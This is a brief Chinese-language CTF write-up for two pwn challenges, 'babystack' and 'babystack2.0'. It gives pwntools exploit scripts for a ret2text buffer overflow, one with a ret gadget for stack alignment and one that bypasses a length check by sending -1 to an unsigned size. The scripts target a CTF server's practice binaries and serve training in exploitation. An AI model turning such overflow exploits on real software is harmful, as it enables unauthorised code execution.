babystack很普通的一道ret2text题,此题本地打不通远程可打通,本地打通需要加上ret_addr
from pwn import *
elf=ELF('./babystack')
io=process('./babystack')
# io=remote("1.14.71.254",28204)
io.sendline(b'100')
ret_addr=0x400561
func_addr=0x4006E6
# payload=cyclic(0x18)+p64(func_addr)
payload=cyclic(0x18)+p64(ret_addr)+p64(func_addr)
io.sendline(payload)
io.interactive()
babystack2.0进一步考虑整数溢出绕过
size_t为无符号,即可下界溢出,其余同原版
from pwn import *
elf=ELF('./babystack2.0')
# io=process('./babystack2.0')
io=remote("1.14.71.254",28264)
io.sendline(b'-1')
ret_addr=0x400599
func_addr=0x400726
payload=cyclic(0x18)+p64(func_addr)
# payload=cyclic(0x18)+p64(ret_addr)+p64(func_addr)
io.sendline(payload)
io.interactive()